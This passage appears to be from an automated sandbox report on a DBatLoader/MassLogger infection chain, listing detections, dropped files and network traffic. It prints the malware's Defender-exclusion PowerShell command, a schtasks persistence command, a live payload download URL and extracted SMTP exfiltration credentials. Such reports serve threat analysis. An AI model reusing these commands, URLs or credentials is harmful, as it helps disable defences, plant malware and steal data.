Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 2920, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2920, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 14:45 /du 23:59 /sc daily /ri 1 /f, ProcessId: 5144, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 2920, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 1600, ProcessName: powershell.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T20:39:58.523792+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	41.185.8.252	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T20:40:15.972518+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49706	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://lwaziacademy.com/wps/200_Oupzhkprnvw

Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	Avira: detection malicious, Label: HEUR/AGEN.1326043
Source: C:\Users\user\AppData\Local\Temp\x.exe	Avira: detection malicious, Label: HEUR/AGEN.1326043
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Avira: detection malicious, Label: TR/ATRAPS.Gen

Found malware configuration

Source: PO#5_Tower_049.bat	Malware Configuration Extractor: DBatLoader {"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}
Source: 7.2.rpkhzpuO.pif.26b1cfc0.11.raw.unpack	Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Oupzhkpr.PIF	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\x.exe	ReversingLabs: Detection: 82%

Multi AV Scanner detection for submitted file

Source: PO#5_Tower_049.bat

ReversingLabs: Detection: 44%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.6% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 7.2.rpkhzpuO.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 18.2.rpkhzpuO.pif.400000.2.unpack
Source: C:\Users\Public\Libraries\rpkhzpuO.pif	Unpacked PE file: 23.2.rpkhzpuO.pif.400000.2.unpack

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 41.185.8.252:443 -> 192.168.2.5:49705 version: TLS 1.2

Source:	Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdb source: x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2104269976.000000007F340000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.0000000020676000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000001.2160139244.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2359070635.00000000008E0000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: rpkhzpuO.pif, 00000007.00000002.2139671913.0000000027F00000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2130466742.0000000025773000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026A85000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000003.2066777727.0000000023BE0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2220114157.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2332577870.000000001D7D3000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2351778016.00000000200D0000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2230537211.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2213918135.000000001BAE6000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2319463942.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2168298227.000000001BAB2000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2351220430.000000001EB95000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000003.2228595916.000000001BAEB000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390210005.000000002DE13000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390829078.000000002F065000.00000004.00000800.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2390995054.0000000030640000.00000004.08000000.00040000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000003.2278096725.000000002C1F3000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rpkhzpuO.pif, 00000017.00000002.2389107729.000000002C1DA000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: easinvoker.pdbGCTL source: x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EDF0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2104269976.000000007F340000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055747965.00000000216A2000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055747965.00000000216D1000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000AE0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000003.2156504119.000000000081D000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000003.2156504119.00000000007EE000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.0000000020676000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000001.2160139244.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244287414.0000000000871000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244287414.00000000008A0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000002.2359070635.00000000008E0000.00000040.00000400.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027C58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

4_2_027C58B4

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 021C7394h	8_2_021C7099
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then jmp 021C78DCh	8_2_021C767A
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	8_2_021C7E60
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	8_2_021C7E5F
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Code function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h	8_2_021C7FBC
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 02D09731h	9_2_02D09480
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 02D09E5Ah	9_2_02D09A40
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 02D09E5Ah	9_2_02D09A30
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 02D09E5Ah	9_2_02D09D87
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A38830h	9_2_05A38588
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A347C9h	9_2_05A34520
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A376D0h	9_2_05A37428
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A3F700h	9_2_05A3F458
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A3E9F8h	9_2_05A3E750
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A35929h	9_2_05A35680
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A3E5A0h	9_2_05A3E180
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A383D8h	9_2_05A38130
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A3F2A8h	9_2_05A3F000
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A354D1h	9_2_05A35228
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A37278h	9_2_05A37268
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A35079h	9_2_05A34DD0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A37F80h	9_2_05A37CD8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A34C21h	9_2_05A34978
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A3FB58h	9_2_05A3F8B0
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A37B28h	9_2_05A37880
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A3EE50h	9_2_05A3EBA8
Source: C:\Users\user\AppData\Local\Temp\Microsofts.exe	Code function: 4x nop then jmp 05A35E15h	9_2_05A35AD8

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://lwaziacademy.com/wps/200_Oupzhkprnvw

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_027DE2F8 InternetCheckConnectionA,

4_2_027DE2F8

Source: global traffic

TCP traffic: 192.168.2.5:52376 -> 162.159.36.2:53

Source: global traffic

HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View

ASN Name: GridhostZA GridhostZA

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 41.185.8.252:443
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 158.101.44.242:80

Source: global traffic	HTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.0

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wps/200_Oupzhkprnvw HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lwaziacademy.com
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: global traffic	DNS traffic detected: DNS query: lwaziacademy.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: 212.20.149.52.in-addr.arpa

Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.comd
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/d
Source: rpkhzpuO.pif, 00000007.00000002.2137347669.0000000026B04000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 00000009.00000000.2098416455.0000000000B72000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: Microsofts.exe, 00000009.00000002.3277651726.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.orgd
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2062232387.000000007ECEA000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.000000002069D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2098429794.00000000218E0000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, rpkhzpuO.pif, 00000017.00000001.2249245726.0000000000949000.00000040.00000001.00020000.00000000.sdmp, rpkhzpuO.pif.4.dr	String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: powershell.exe, 0000000A.00000002.2166666911.0000000003397000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mi
Source: x.exe, 00000004.00000002.2104269976.000000007F3A9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2084775206.0000000020600000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE59000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096847638.0000000021836000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055177282.000000007EE03000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2055374127.000000007EDA0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2096500000.00000000216FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000007.00000001.2063317653.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2224362604.00000000206EE000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000000E.00000002.2237819095.0000000021060000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000012.00000002.2270156460.0000000000949000.00000040.00000400.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000014.00000003.2244899166.0000000000870000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 